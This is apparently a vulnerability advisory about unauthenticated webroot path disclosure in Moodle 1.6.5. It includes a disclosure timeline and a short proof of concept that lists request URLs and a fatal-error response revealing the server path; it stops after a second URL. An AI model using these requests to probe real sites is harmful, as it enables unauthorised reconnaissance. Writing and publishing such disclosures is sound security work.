PR08-15: Several Webroot Disclosures on Moodle

PR08-15: Several Webroot Disclosures on Moodle

Vulnerability found: 20/06/2008

Vendor informed: 25/06/2008

Vulnerability fixed: 16/07/2008

Advisory publicly released: 22/07/2008

Severity: Low

Description:

Moodle 1.6.5 is vulnerable to several webroot disclosures. No
authentication is required to obtain the webroot paths.

Proof of concept:

Requested URL:
https://moodle.target.ac.uk/blog/blogpage.php

Response:
Fatal error: Class 'page_base' not found in
/Volumes/≤dir_name>/data/moodle/blog/blogpage.php on line 9

Requested URL:
https://moodle.target.ac.uk/course/report/stats/report.php